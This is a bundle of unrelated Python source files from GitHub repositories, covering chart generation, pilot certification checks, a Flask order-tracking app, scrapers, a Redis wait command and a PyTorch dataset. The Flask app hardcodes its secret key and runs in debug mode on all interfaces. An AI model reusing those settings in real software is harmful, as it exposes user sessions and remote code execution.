def update_graph_data(config, new_record):
"""
Example dataformat that will be passed around. Including the json file on disk.
Input example:
('2014-12-10', [{'code': 501, 'count': 1}, {'code': 200, 'count': 340132}])
Will be stored as:
[
('2014-12-10', [{'code': 501, 'count': 1}, {'code': 200, 'count': 340132}]),
('2014-12-10', [{'code': 501, 'count': 1}, {'code': 200, 'count': 340132}])
]
"""
exists = os.path.isfile(config['history_file'])
with file(config['history_file'], 'r' if exists else 'w') as dump:
schema = {'index': [], 'data': []}
all_entries = pickle.load(dump) if exists else schema
the_date = new_record[0]
if the_date not in all_entries['index'] or config['force_update']:
if the_date in all_entries['index']:
sys.stderr.write('warning: writing duplicate entry\n')
all_entries['data'].append(new_record)
all_entries['index'].append(the_date)
else:
sys.stderr.write('warning: did not append, data found in index\n')
with file(config['history_file'], 'w') as dump:
pickle.dump(all_entries, dump)
return unpack_data(all_entries['data'])
def chart_config(api_key, chart_data):
# https://developer.geckoboard.com/#highcharts-example
highcharts_data = {
"chart": {
"style": {"color": "#b9bbbb"},
"renderTo": "container",
"backgroundColor": "transparent",
"lineColor": "rgba(35,37,38,100)",
"plotShadow": False
},
"credits": {"enabled": False},
"title": {
"style": {"color": "#b9bbbb"},
"text": "Daily HTTP Status Codes"
},
"xAxis": {
"categories": chart_data['categories']
},
"yAxis": {"title": {"style": {"color": "#b9bbbb"}, "text": "HTTP Requests"}},
"legend": {
"itemStyle": {"color": "#b9bbbb"},
"layout": "vertical",
"align": "right",
"verticalAlign": "middle",
"borderWidth":0
},
"series": chart_data['series']
}
highcharts_js = json.dumps(highcharts_data).replace('"', '\\"')
# http://wiki.bash-hackers.org/syntax/quoting
# - weak quoting with double-quotes: "stuff"
# - strong quoting with single-quotes: 'stuff'
# note: inside a single-qouted string NOTHING(!!!) is interpreted.
return "'{\"api_key\": \"%s\", \"data\": {\"highchart\": \"%s\"}}'" % (api_key, highcharts_js)
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='update_graph_data',
description=("Appends given data to graph data in Javascript format."
". Which can be accepted by Highcharts (Geckoboard API)"),
add_help=True)
parser.add_argument('filepath', type=str, help='Path to the stats file. (output from uniq -c)')
parser.add_argument('--history', dest='history_file', type=str, help='Path to the stats file. (output from uniq -c)', required=True)
parser.add_argument('--force-update', action='store_true', help='Force to update the history file, if the date already exists on disk')
parser.add_argument('--api-key', type=str, help='Date of this graph stats in YYYYmmdd', required=True)
parser.add_argument('--date', type=str, help='Date of this graph stats in YYYYmmdd')
args = parser.parse_args()
config = args.__dict__
if config['force_update']:
sys.stderr.write('warning: using --force-update, this will append data and possibly duplicate \n')
sys.stderr.write('warning: press ^C to cancel (program starts in 1 second..)\n')
time.sleep(1)
new_record = (config['date'], fetch_input(args.filepath))
chart_data = update_graph_data(config, new_record)
sys.stdout.write(chart_config(config['api_key'], chart_data))
#test:
#data = [('2014-12-10', [{'count': '7', 'code': '200'}, {'count': '3', 'code': '204'}]),
# ('2014-12-11', [{'count': '9', 'code': '200'}, {'count': '1', 'code': '204'}]),
# ('2014-12-13', [{'count': '3', 'code': '200'}, {'count': '2', 'code': '204'}])]
#unpacked = unpack_data(data)
| stefanooldeman/gecko_http_codes | update_graph_data.py | update_graph_data.py | py | 6,440 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.isfile",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 87,
"usage_type": "attribute"
},
{
"api_name": "pickle.load",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "sys.stderr.write",
"line_... |
26319259400 | """
Module determining pilot certifications, ratings, and endorsements.
The restrictions that we place on a pilot depend on their qualifications. There are three
ways to think about a pilot.
(1) Certifications. These are what licenses a pilot has. We also use these to classify
where the student is in the licensing process. Is the student post solo (can fly without
instructor), but before license? Is the student 50 hours past their license (a threshold
that helps with insurance)?
(2) Ratings. These are extra add-ons that a pilot can add to a license. For this project,
the only rating is Instrument Rating, which allows a pilot to fly through adverse weather
using only instruments.
(3) Endorsements. These are permission to fly certain types of planes solo. Advanced
allows a pilot to fly a plane with retractable landing gear. Multiengine allows a pilot
to fly a plane with more than one engine.
The file pilots.csv is a list of all pilots in the school, together with the dates that
they earned these certifications, ratings, and endorsements. Specifically, this CSV file
has the following header:
ID LASTNAME FIRSTNAME JOINED SOLO LICENSE 50 HOURS INSTRUMENT ADVANCED MULTIENGINE
The first three columns are strings, while all other columns are dates.
The functions in this class take a row from the pilot table and determine if a pilot has
a certain qualification at the time of takeoff. As this program is auditing the school
over a course of a year, a student may not be instrument rated for one flight but might
be for another.
The preconditions for many of these functions are quite messy. While this makes writing
the functions simpler (because the preconditions ensure we have less to worry about),
enforcing these preconditions can be quite hard. That is why it is not necessary to
enforce any of the preconditions in this module.
Author: Christopher Jordan
Date: September 18, 2021
"""
import utils
# CERTIFICATION CLASSIFICATIONS
# The certification of this pilot is unknown
PILOT_INVALID = -1
# A pilot that has joined the school, but has not soloed
PILOT_NOVICE = 0
# A pilot that has soloed but does not have a license
PILOT_STUDENT = 1
# A pilot that has a license, but has under 50 hours post license
PILOT_CERTIFIED = 2
# A pilot that 50 hours post license
PILOT_50_HOURS = 3
def get_certification(takeoff,student):
"""
Returns the certification classification for this student at the time of takeoff.
The certification is represented by an int, and must be the value PILOT_NOVICE,
PILOT_STUDENT, PILOT_CERTIFIED, PILOT_50_HOURS, or PILOT_INVALID. It is PILOT_50_HOURS
if the student has certified '50 Hours' before this flight takeoff. It is
PILOT_CERTIFIED if the student has a private license before this takeoff and
PILOT_STUDENT is the student has soloed before this takeoff. A pilot that has only
just joined the school is PILOT_NOVICE. If the flight takes place before the student
has even joined the school, the result is PILOT_INVALID.
Recall that a student is a 10-element list of strings. The first three elements are
the student's identifier, last name, and first name. The remaining elements are all
timestamps indicating the following in order: time joining the school, time of first
solo, time of private license, time of 50 hours certification, time of instrument
rating, time of advanced endorsement, and time of multiengine endorsement.
Parameter takeoff: The takeoff time of this flight
Precondition: takeoff is a datetime object
Parameter student: The student pilot
Precondition: student is 10-element list of strings representing a pilot
"""
tz_i = takeoff.tzinfo
parse_student = student[3:]
new_student = []
for x in range(len(parse_student)):
if parse_student[x] != '':
new_student.append(utils.str_to_time(parse_student[x]))
elif parse_student[x] == '':
new_student.append(parse_student[x])
tz_student = []
for x in range(len(new_student)):
if new_student[x] != '':
var = new_student[x].replace(tzinfo=tz_i)
tz_student.append(var)
elif new_student[x] == '':
tz_student.append(new_student[x])
if tz_student[3] != '':
if takeoff > tz_student[3]:
return PILOT_50_HOURS
elif takeoff > tz_student[2]:
return PILOT_CERTIFIED
elif takeoff > tz_student[1]:
return PILOT_STUDENT
elif takeoff > tz_student[0]:
return PILOT_NOVICE
elif takeoff < tz_student[0]:
return PILOT_INVALID
elif tz_student[2] != '':
if takeoff > tz_student[2]:
return PILOT_CERTIFIED
elif takeoff > tz_student[1]:
return PILOT_STUDENT
elif takeoff > tz_student[0]:
return PILOT_NOVICE
elif takeoff < tz_student[0]:
return PILOT_INVALID
elif tz_student[1] != '':
if takeoff > tz_student[1]:
return PILOT_STUDENT
elif takeoff > tz_student[0]:
return PILOT_NOVICE
elif takeoff < tz_student[0]:
return PILOT_INVALID
elif tz_student[0] != '':
if takeoff > tz_student[0]:
return PILOT_NOVICE
elif takeoff < tz_student[0]:
return PILOT_INVALID
else:
return PILOT_INVALID
"""
if student[6] != '':
if takeoff > utils.str_to_time(student[6]):
return PILOT_50_HOURS
elif takeoff > utils.str_to_time(student[5]):
return PILOT_CERTIFIED
elif takeoff > utils.str_to_time(student[4]):
return PILOT_STUDENT
elif takeoff > utils.str_to_time(student[3]):
return PILOT_NOVICE
elif takeoff < utils.str_to_time(student[3]):
return PILOT_INVALID
elif student[5] != '':
if takeoff > utils.str_to_time(student[5]):
return PILOT_CERTIFIED
elif takeoff > utils.str_to_time(student[4]):
return PILOT_STUDENT
elif takeoff > utils.str_to_time(student[3]):
return PILOT_NOVICE
elif takeoff < utils.str_to_time(student[3]):
return PILOT_INVALID
elif student[4] != '':
if takeoff > utils.str_to_time(student[4]):
return PILOT_STUDENT
elif takeoff > utils.str_to_time(student[3]):
return PILOT_NOVICE
elif takeoff < utils.str_to_time(student[3]):
return PILOT_INVALID
elif student[3] != '':
if takeoff > utils.str_to_time(student[3]):
return PILOT_NOVICE
elif takeoff < utils.str_to_time(student[3]):
return PILOT_INVALID
else:
return PILOT_INVALID
"""
def has_instrument_rating(takeoff,student):
"""
Returns True if the student has an instrument rating at the time of takeoff, False otherwise
Recall that a student is a 10-element list of strings. The first three elements are
the student's identifier, last name, and first name. The remaining elements are all
timestamps indicating the following in order: time joining the school, time of first
solo, time of private license, time of 50 hours certification, time of instrument
rating, time of advanced endorsement, and time of multiengine endorsement.
NOTE: Just because a pilot has an instrument rating does not mean that every flight
with that pilot is an IFR flight. It just means the pilot could choose to use VFR
or IFR rules.
Parameter takeoff: The takeoff time of this flight
Precondition: takeoff is a datetime object
Parameter student: The student pilot
Precondition: student is 10-element list of strings representing a pilot
"""
if student[7] != '' and takeoff > utils.str_to_time(student[7]):
return True
else:
return False
def has_advanced_endorsement(takeoff,student):
"""
Returns True if the student has an endorsement to fly an advanced plane at the time of takeoff.
The function returns False otherwise.
Recall that a student is a 10-element list of strings. The first three elements are
the student's identifier, last name, and first name. The remaining elements are all
timestamps indicating the following in order: time joining the school, time of first
solo, time of private license, time of 50 hours certification, time of instrument
rating, time of advanced endorsement, and time of multiengine endorsement.
Parameter takeoff: The takeoff time of this flight
Precondition: takeoff is a datetime object
Parameter student: The student pilot
Precondition: student is 10-element list of strings representing a pilot
"""
if student[8] != '' and takeoff > utils.str_to_time(student[8]):
return True
else:
return False
def has_multiengine_endorsement(takeoff,student):
"""
Returns True if the student has an endorsement to fly an multiengine plane at the time of takeoff.
The function returns False otherwise.
Recall that a student is a 10-element list of strings. The first three elements are
the student's identifier, last name, and first name. The remaining elements are all
timestamps indicating the following in order: time joining the school, time of first
solo, time of private license, time of 50 hours certification, time of instrument
rating, time of advanced endorsement, and time of multiengine endorsement.
Parameter takeoff: The takeoff time of this flight
Precondition: takeoff is a datetime object
Parameter student: The student pilot
Precondition: student is 10-element list of strings representing a pilot
"""
if student[9] != '' and takeoff > utils.str_to_time(student[9]):
return True
else:
return False
def get_minimums(cert, area, instructed, vfr, daytime, minimums):
"""
Returns the most advantageous minimums for the given flight category.
The minimums is the 2-dimensional list (table) of minimums, including the header.
The header for this table is as follows:
CATEGORY CONDITIONS AREA TIME CEILING VISIBILITY WIND CROSSWIND
The values in the first four columns are strings, while the values in the last
four columns are numbers. CEILING is a measurement in ft, while VISIBILITY is in
miles. Both WIND and CROSSWIND are speeds in knots.
This function first searches the table for rows that match the function parameters.
It is possible for more than one row to be a match. A row is a match if ALL four
of the first four columns match.
The first column (CATEGORY) has values 'Student', 'Certified', '50 Hours', or 'Dual'.
If the value 'Student', it is a match if category is PILOT_STUDENT or higher. If
the value is 'Certified, it is a match if category is PILOT_CERTIFIED or higher. If
it is '50 Hours', it is only a match if category is PILOT_50_HOURS. The value 'Dual'
only matches if instructed is True.
The second column (CONDITIONS) has values 'VMC' and 'IMC'. A flight filed as VFR
(visual flight rules) is subject to VMC (visual meteorological conditions) minimums.
Similarly, a fight filed as IFR is subject to IMC minimums.
The third column (AREA) has values 'Pattern', 'Practice Area', 'Local',
'Cross Country', or 'Any'. Flights that are in the pattern or practice area match
'Local' as well. All flights match 'Any'.
The fourth column (TIME) has values 'Day' or 'Night'. The value 'Day' is only
a match if daytime is True. If it is False, 'Night' is the only match.
Once the function finds the all matching rows, it searches for the most advantageous
values for CEILING, VISIBILITY, WIND, and CROSSWIND. Lower values of CEILING and
VISIBILITY are better. Higher values for WIND and CROSSWIND are better. It then
returns this four values as a list of four floats (in the same order they appear)
in the table.
Example: Suppose minimums is the table
CATEGORY CONDITIONS AREA TIME CEILING VISIBILITY WIND CROSSWIND
Student VMC Pattern Day 2000 5 20 8
Student VMC Practice Area Day 3000 10 20 8
Certified VMC Local Day 3000 5 20 20
Certified VMC Practice Area Night 3000 10 20 10
50 Hours VMC Local Day 3000 10 20 10
Dual VMC Any Day 2000 10 30 10
Dual IMC Any Day 500 0.75 30 20
The call get_minimums(PILOT_CERTIFIED,'Practice Area',True,True,True,minimums) matches
all of the following rows:
Student VMC Practice Area Day 3000 10 20 8
Certified VMC Local Day 3000 5 20 20
Dual VMC Any Day 2000 10 30 10
The answer in this case is [2000,5,30,20]. 2000 and 5 are the least CEILING and
VISIBILITY values while 30 and 20 are the largest wind values.
If there are no rows that match the parameters (e.g. a novice pilot with no
instructor), this function returns None.
Parameter cert: The pilot certification
Precondition: cert is in int and one PILOT_NOVICE, PILOT_STUDENT, PILOT_CERTIFIED,
PILOT_50_HOURS, or PILOT_INVALID.
Parameter area: The flight area for this flight plan
Precondition: area is a string and one of 'Pattern', 'Practice Area' or 'Cross Country'
Parameter instructed: Whether an instructor is present
Precondition: instructed is a boolean
Parameter vfr: Whether the pilot has filed this as an VFR flight
Precondition: vfr is a boolean
Parameter daytime: Whether this flight is during the day
Precondition: daytime is boolean
Parameter minimums: The table of allowed minimums
Precondition: minimums is a 2d-list (table) as described above, including header
"""
# Find all rows that can apply to this student
# Find the best values for each column of the row
try:
category_matches = []
conditions_matches = []
area_matches = ['Any']
time_matches = []
#cert / CATEGORY
if cert == 1:
category_matches.append('Student')
elif cert == 2:
category_matches.append('Student')
category_matches.append('Certified')
elif cert == 3:
category_matches.append('Student')
category_matches.append('Certified')
category_matches.append('50 Hours')
#area / AREA
if area == 'Pattern':
area_matches.append(area)
area_matches.append('Local')
elif area == 'Practice Area':
area_matches.append(area)
area_matches.append('Local')
elif area == 'Cross Country':
area_matches.append(area)
#instructed / CATEGORY addition
if instructed == True:
category_matches.append('Dual')
#VFR / CONDITIONS
if vfr == True:
conditions_matches.append('VMC')
elif vfr == False:
conditions_matches.append('IMC')
#Daytime / TIME
if daytime == True:
time_matches.append('Day')
elif daytime == False:
time_matches.append('Night')
#FIND MATCHES
matches = []
for row in range(len(minimums)):
if minimums[row][0] in category_matches and minimums[row][1] in conditions_matches and minimums[row][2] in area_matches and minimums[row][3] in time_matches:
matches.append(minimums[row])
#create a list of mins as floats from matches
ceilings = []
for row in range(len(matches)):
ceilings.append(matches[row][4])
ceilings = [float(x) for x in ceilings]
visibilitys = []
for row in range(len(matches)):
visibilitys.append(matches[row][5])
visibilitys = [float(x) for x in visibilitys]
winds = []
for row in range(len(matches)):
winds.append(matches[row][6])
winds = [float(x) for x in winds]
crosswinds = []
for row in range(len(matches)):
crosswinds.append(matches[row][7])
crosswinds = [float(x) for x in crosswinds]
#GET BEST MINIMUMS from results
min_ceiling = min(ceilings)
min_visibility = min(visibilitys)
min_wind = max(winds)
min_crosswind = max(crosswinds)
return [min_ceiling, min_visibility, min_wind, min_crosswind]
except:
return None
| ChrisMJordan/eCornell_Cert_Project | pilots.py | pilots.py | py | 16,872 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "utils.str_to_time",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "utils.str_to_time",
"line_number": 193,
"usage_type": "call"
},
{
"api_name": "utils.str_to_time",
"line_number": 217,
"usage_type": "call"
},
{
"api_name": "utils.str_to_... |
70846346343 | import models.data
import models.email_notice
from flask import Flask, request, render_template, redirect, flash, url_for, session, abort
app = Flask(__name__, static_url_path='', root_path='/root/SPM')
@app.route('/')
def index():
return app.send_static_file('index.html')
@app.route('/user_view')
def user_view():
if not session.get('logged_in'):
return redirect(url_for("login"))
try:
data_connector = models.data.data_layer()
entries = data_connector.find_all_order_by_username(session["name"])
info = session["info"]
return render_template('user_view.html', entries=entries, info=info)
except Exception as e:
print(e)
return redirect(url_for("login"))
@app.route('/manage_view')
def manage_view():
if not session.get('logged_in'):
return redirect(url_for("login", title="manager"))
try:
data_connector = models.data.data_layer()
entries = data_connector.find_all_order()
info = session["info"]
return render_template('manage_view.html', entries=entries, info=info)
except Exception as e:
print(e)
return redirect(url_for("login"))
@app.route('/add_order', methods=['POST'])
def add_order():
if not session.get('logged_in'):
abort(401)
order_info = {
"username": session["name"],
"number_box": request.form['number_box'],
"d_address": request.form['d_address'],
"a_address": request.form['a_address'],
"d_date": request.form['d_date'],
"a_date": request.form['a_date'],
"o_message": request.form['o_message']
}
data_connector = models.data.data_layer()
if data_connector.add_new_order(order_info):
flash('New entry was successfully posted!')
else:
flash('Unknown Error!')
return redirect(url_for('user_view'))
@app.route('/update_order', methods=['GET', 'POST'])
def update_order():
if not session.get('logged_in'):
abort(401)
if request.method == 'POST':
order_info = {
"order_number": request.form['order_number'],
"status": request.form['status'],
"d_address": request.form['d_address'],
"a_address": request.form['a_address'],
"d_date": request.form['d_date'],
"a_date": request.form['a_date'],
"p_date": request.form['p_date'],
"h_number": request.form['h_number'],
"o_message": request.form['o_message'],
"os_message": request.form['os_message'],
}
# print(order_info)
data_connector = models.data.data_layer()
if data_connector.update_order_by_order_number(order_info):
flash('This entry was successfully updated!')
order_number = order_info["order_number"]
print("order_number:", order_number)
email_address = data_connector.get_email_by_order_number(order_number)
print("email_address:", email_address)
models.email_notice.send_email(email_address, order_info)
else:
flash('Unknown Error!')
return redirect(url_for('manage_view'))
if request.method == "GET":
order_number = request.args.get('order_number')
data_connector = models.data.data_layer()
entire = data_connector.find_order(order_number)
return render_template('order_modify.html', entire=entire)
@app.route('/login', methods=['GET', 'POST'])
def login():
error = None
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
title = request.form['title']
data_connector = models.data.data_layer()
check_result, userinfo = data_connector.login_check(username, password, title)
if not check_result:
error = "Invaild username or password!"
return render_template('login.html', message=error, title=title)
else:
session['logged_in'] = True
session["name"] = userinfo["username"]
session['info'] = userinfo
flash('You were logged in')
if title == "manager":
return redirect(url_for("manage_view"))
elif title == "user":
return redirect(url_for("user_view"))
if request.method == "GET":
title = request.args.get('title')
if not title:
title = "user"
return render_template('login.html', title=title)
@app.route('/logout')
def logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('index'))
@app.route("/register", methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
home_address = request.form['home_address']
phone_number = request.form['phone_number']
email_address = request.form['email_address']
user_dict = {"username": username,
"password": password,
"home_address": home_address,
"phone_number": phone_number,
"email_address": email_address}
try:
data_connector = models.data.data_layer()
if data_connector.register_new_customer(user_dict):
message = "Sign up successful!"
return redirect(url_for("login", message=message))
else:
raise Exception("Database connect error!")
except Exception as e:
print("Exception(Datalayer): ", e)
return render_template('register.html')
else:
return render_template('register.html')
if __name__ == '__main__':
app.secret_key = 'super secret key'
app.run(host='0.0.0.0', debug=True)
| Elfsong/SPM | demo.py | demo.py | py | 5,888 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "flask.session.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "flask.session",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "flask.redirect",
"line... |
29053052757 | from db import session, UniqueVictims, Victims
from sqlalchemy.sql import func
def calc_totals():
"""
Calculate the total time frame the IP appears in and the udp/tcp/icmp packet
count as well as the packets/s rate
:return:
"""
all_victims = session.query(UniqueVictims).all()
for victim in all_victims:
ip = victim.ip
victim.time_frame_count = session.query(Victims).filter_by(ip=ip).count()
victim.tcp_count = session.query(func.sum(Victims.tcp_count).filter(Victims.ip == ip)).scalar()
victim.udp_count = session.query(func.sum(Victims.udp_count).filter(Victims.ip == ip)).scalar()
victim.icmp_count = session.query(func.sum(Victims.icmp_count).filter(Victims.ip == ip)).scalar()
victim.rate = (victim.udp_count + victim.tcp_count + victim.icmp_count)/(victim.time_frame_count * 60)
session.commit()
if __name__ == '__main__':
calc_totals()
| Kbman99/DDoS-Detection | calculate.py | calculate.py | py | 934 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "db.session.query",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "db.UniqueVictims",
"line_number": 11,
"usage_type": "argument"
},
{
"api_name": "db.session",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "db.session.query",
... |
71809107943 | # Import files
from ScrapingProducts.AmazonRateLimiterException import AmazonRateLimiterException
from Utilities.Utils import get_page_source
from Utilities.MetadataUtils import *
# Import libraries
from bs4 import BeautifulSoup
import logging as logger
import time
AMAZON_ERROR = "Sorry! Something went wrong on our end. Please go back and try again or go to Amazon's home page."
def crawl_item(curr_url, retry=0):
try:
page = get_page_source(curr_url)
if AMAZON_ERROR in page:
raise AmazonRateLimiterException
soup1 = BeautifulSoup(page, "html.parser")
soup2 = BeautifulSoup(soup1.prettify(), "html.parser")
BSR = get_best_sellers_rank(page)
top_category = get_top_category(soup2)
#bsr_category = category
bottom_category = get_bottom_category(soup2)
category = ""
if top_category != "NA":
category = top_category
else:
category = bottom_category
product = {
'name': get_name(soup2),
'topCategory': top_category,
'bottomCategory': bottom_category,
'price': get_price(soup2),
'ASIN': get_asin(curr_url),
'reviews': get_reviews(soup2),
'rating': get_rating(soup2),
'search': get_search(category, curr_url),
'url': curr_url,
'BSR': BSR
}
return product
except AmazonRateLimiterException as a:
print("Amazon is probably blocking us. Will sleep for 1800 seconds and retry")
time.sleep(1800)
if retry < 3:
crawl_item(curr_url, retry + 1)
except Exception as e:
logger.error("Error occurred: " + str(e))
logger.error("URL:" + str(curr_url))
return None
| Yogesh19921/Scrapper | CollectingProducts/Crawl.py | Crawl.py | py | 1,798 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Utilities.Utils.get_page_source",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ScrapingProducts.AmazonRateLimiterException.AmazonRateLimiterException",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 21,... |
36060739387 | from lxml import html
import requests
# Define parsing function
def parse(score):
return float(score[2:score.index('-')])
def scrape(league_id):
# Store scores in list
league_scores = []
# Loop through each team
for team_id in range(1, 13):
# Make request
page = requests.get('http://games.espn.go.com/ffl/schedule?leagueId=' + league_id + '&teamId=' + str(team_id))
tree = html.fromstring(page.text)
# Get team name
team_name = tree.xpath('//h1/text()')
team_name = [name for name in team_name if name != '\n'][0].replace(' Schedule', '')
# Get weekly scores
if team_name != 'Mass Text Appeal III':
weekly_scores = tree.xpath('//nobr//a[@href]/text()')
weekly_scores = [score for score in weekly_scores if score != 'Box' and (score[0] == 'W' or score[0] =='L')]
weekly_scores = list(map(parse, weekly_scores))
# Store in league_scores list
league_scores.append({
'name': team_name,
'scores': weekly_scores
})
return league_scores | JonathanWarrick/data-viz-web-crawler | web_scraper.py | web_scraper.py | py | 987 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "lxml.html.fromstring",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "lxml.html",
"line_number": 16,
"usage_type": "name"
}
] |
3353061598 | import time
import redis
from django.core.management import BaseCommand
from django.conf import settings
class Command(BaseCommand):
def handle(self, *args, **options):
self.stdout.write('Waiting for Redis...')
redis_instance = redis.StrictRedis(host=settings.REDIS_HOST,
port=settings.REDIS_PORT, db=0)
while True:
try:
redis_instance.ping()
break
except Exception:
self.stdout.write('Redis unavailable, waititng 1 second...')
time.sleep(1)
self.stdout.write(self.style.SUCCESS('Redis available!'))
| MykKos/discord_automated_sender | discord_posts/management/commands/check_on_redis.py | check_on_redis.py | py | 671 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.core.management.BaseCommand",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "redis.StrictRedis",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.conf.settings.REDIS_HOST",
"line_number": 11,
"usage_type": "attribute"
},
... |
3751805748 | from __future__ import print_function, division
from torch.utils.data import Dataset, DataLoader
import scipy.io as scp
from keras.utils import to_categorical
import numpy as np
import torch
from matplotlib import pyplot as plt
import warnings
warnings.filterwarnings("ignore")
from matplotlib import pyplot as plt
from scipy.stats.stats import pearsonr
from block import fusions
twenty_six_labels = {'Affection': ['loving', 'friendly'], 'Anger': ['anger', 'furious', 'resentful', 'outraged', 'vengeful'],
'Annoyance': ['annoy', 'frustrated', 'irritated', 'agitated', 'bitter', 'insensitive', 'exasperated', 'displeased'],
'Anticipation': ['optimistic', 'hopeful', 'imaginative', 'eager'],
'Aversion': ['disgusted', 'horrified', 'hateful'],
'Confidence': ['confident', 'proud', 'stubborn', 'defiant', 'independent', 'convincing'],
'Disapproval': ['disapproving', 'hostile', 'unfriendly', 'mean', 'disrespectful', 'mocking', 'condescending', 'cunning', 'manipulative', 'nasty', 'deceitful', 'conceited', 'sleazy', 'greedy', 'rebellious', 'petty'],
'Disconnection': ['indifferent', 'bored', 'distracted', 'distant', 'uninterested', 'self-centered', 'lonely', 'cynical', 'restrained', 'unimpressed', 'dismissive'] ,
'Disquietment': ['worried', 'nervous', 'tense', 'anxious','afraid', 'alarmed', 'suspicious', 'uncomfortable', 'hesitant', 'reluctant', 'insecure', 'stressed', 'unsatisfied', 'solemn', 'submissive'] ,
'Doubt/Conf': ['confused', 'skeptical', 'indecisive'] ,
'Embarrassment': ['embarrassed', 'ashamed', 'humiliated'] ,
'Engagement': ['curious', 'serious', 'intrigued', 'persistent', 'interested', 'attentive', 'fascinated'] ,
'Esteem': ['respectful', 'grateful'] ,
'Excitement': ['excited', 'enthusiastic', 'energetic', 'playful', 'impatient', 'panicky', 'impulsive', 'hasty'] ,
'Fatigue': ['tired', 'sleepy', 'drowsy'] ,
'Fear': ['scared', 'fearful', 'timid', 'terrified'] ,
'Happiness': ['cheerful', 'delighted', 'happy', 'amused', 'laughing', 'thrilled', 'smiling', 'pleased', 'overwhelmed', 'ecstatic', 'exuberant'] ,
'Pain': ['pain'] ,
'Peace': ['content', 'relieved', 'relaxed', 'calm', 'quiet', 'satisfied', 'reserved', 'carefree'] ,
'Pleasure': ['funny', 'attracted', 'aroused', 'hedonistic', 'pleasant', 'flattered', 'entertaining', 'mesmerized'] ,
'Sadness': ['sad', 'melancholy', 'upset', 'disappointed', 'discouraged', 'grumpy', 'crying', 'regretful', 'grief-stricken', 'depressed', 'heartbroken', 'remorseful', 'hopeless', 'pensive', 'miserable'] ,
'Sensitivity': ['apologetic', 'nostalgic'] ,
'Suffering': ['offended', 'hurt', 'insulted', 'ignorant', 'disturbed', 'abusive', 'offensive'],
'Surprise': ['surprise', 'surprised', 'shocked', 'amazed', 'startled', 'astonished', 'speechless', 'disbelieving', 'incredulous'],
'Sympathy': ['kind', 'compassionate', 'supportive', 'sympathetic', 'encouraging', 'thoughtful', 'understanding', 'generous', 'concerned', 'dependable', 'caring', 'forgiving', 'reassuring', 'gentle'],
'Yearning': ['jealous', 'determined', 'aggressive', 'desperate', 'focused', 'dedicated', 'diligent'] ,
'None': ['None']}
class MovieGraphDataset(Dataset):
def __init__(self, data):
self.data = data
self.movie_idx = list(self.data.keys()) # ['tt03045', 'tt0840830' ...] etc
self.num_samples = len(list(self.data.keys())) # 51 movies ideally
self.new_data = {}
for movie in self.movie_idx:
num_clips = list(self.data[movie].keys())
self.new_data[movie] = []
self.new_data[movie].append(len(num_clips))
self.new_data[movie].append( np.array([self.data[movie][clip]['face'] for clip in num_clips]) )
self.new_data[movie].append( np.array([self.data[movie][clip]['va'] for clip in num_clips]) )
self.new_data[movie].append( np.array([self.data[movie][clip]['embed_description'] for clip in num_clips]) )
self.new_data[movie].append( np.array([self.data[movie][clip]['embed_situation'] for clip in num_clips]) )
self.new_data[movie].append( np.array([self.data[movie][clip]['embed_scene'] for clip in num_clips]) )
self.new_data[movie].append( np.array([self.data[movie][clip]['embed_transcript'] for clip in num_clips]) )
self.new_data[movie].append( np.array([self.data[movie][clip]['emotions'] for clip in num_clips]) )
for f in range(len(num_clips)):
emot_labels = self.new_data[movie][7][f]
if len(emot_labels) == 0:
emot_labels.append('None')
labels = list(twenty_six_labels.keys())
integer_mapping = {x: i for i, x in enumerate(labels)}
vec = [integer_mapping[word] for word in labels]
encoded = to_categorical(vec)
emot_encoding = []
for emot in emot_labels:
emot_encoding.append(list(encoded[integer_mapping[emot]]))
emot_labels = [sum(x) for x in zip(*emot_encoding)]
self.new_data[movie][7][f] = emot_labels
self.new_data[movie][7] = np.array(list(self.new_data[movie][7]))
def __len__(self):
return self.num_samples
def __getitem__(self, idx):
idx = self.movie_idx[idx]
F = self.new_data[idx][1]
Va = self.new_data[idx][2]
emb_desc = self.new_data[idx][3]
emb_sit = self.new_data[idx][4]
emb_sce = self.new_data[idx][5]
emb_trans = self.new_data[idx][6]
y = self.new_data[idx][7]
combined = np.hstack([F, Va, emb_desc, emb_sit, emb_sce, emb_trans])
F = torch.Tensor(F)
Va = torch.Tensor(Va)
emb_desc = torch.Tensor(emb_desc)
emb_sit = torch.Tensor(emb_sit)
emb_sce = torch.Tensor(emb_sce)
emb_trans = torch.Tensor(emb_trans)
# Instantiate fusion classes
fusion1 = fusions.Block([F.shape[1], Va.shape[1]], emb_desc.shape[1])
fusion2 = fusions.Block([emb_desc.shape[1], emb_desc.shape[1]], F.shape[1] + Va.shape[1] + emb_desc.shape[1])
fusion3 = fusions.Block([emb_sit.shape[1], emb_sce.shape[1]], emb_trans.shape[1])
fusion4 = fusions.Block([emb_trans.shape[1], emb_trans.shape[1]], emb_sit.shape[1] + emb_sce.shape[1] + emb_trans.shape[1])
# compute fusions
temp_output_fusion1 = fusion1([F, Va])
first_three= fusion2([temp_output_fusion1, emb_desc])
temp_output_fusion2 = fusion3([emb_sit, emb_sce])
second_three = fusion4([temp_output_fusion2, emb_trans])
